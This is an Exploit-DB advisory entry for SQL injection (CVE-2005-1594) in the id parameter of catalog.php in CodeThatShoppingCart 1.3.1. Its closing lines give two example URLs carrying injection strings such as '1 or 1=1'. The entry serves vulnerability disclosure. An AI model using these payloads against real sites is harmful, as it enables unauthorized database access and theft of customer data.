CodeThatShoppingCart 1.3.1 catalog.php id Parameter SQL Injection

2005-05-09T00:00:00
ID EDB-ID:25638
Type exploitdb
Reporter Lostmon
Modified 2005-05-09T00:00:00

Description

CodeThatShoppingCart 1.3.1 catalog.php id Parameter SQL Injection. CVE-2005-1594. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/13560/info
 
CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data.
 
CodeThatShoppingCart 1.3.1 was reported to be vulnerable. Other versions may be affected as well. 

http://www.example.com/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60

http://www.example.com/shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1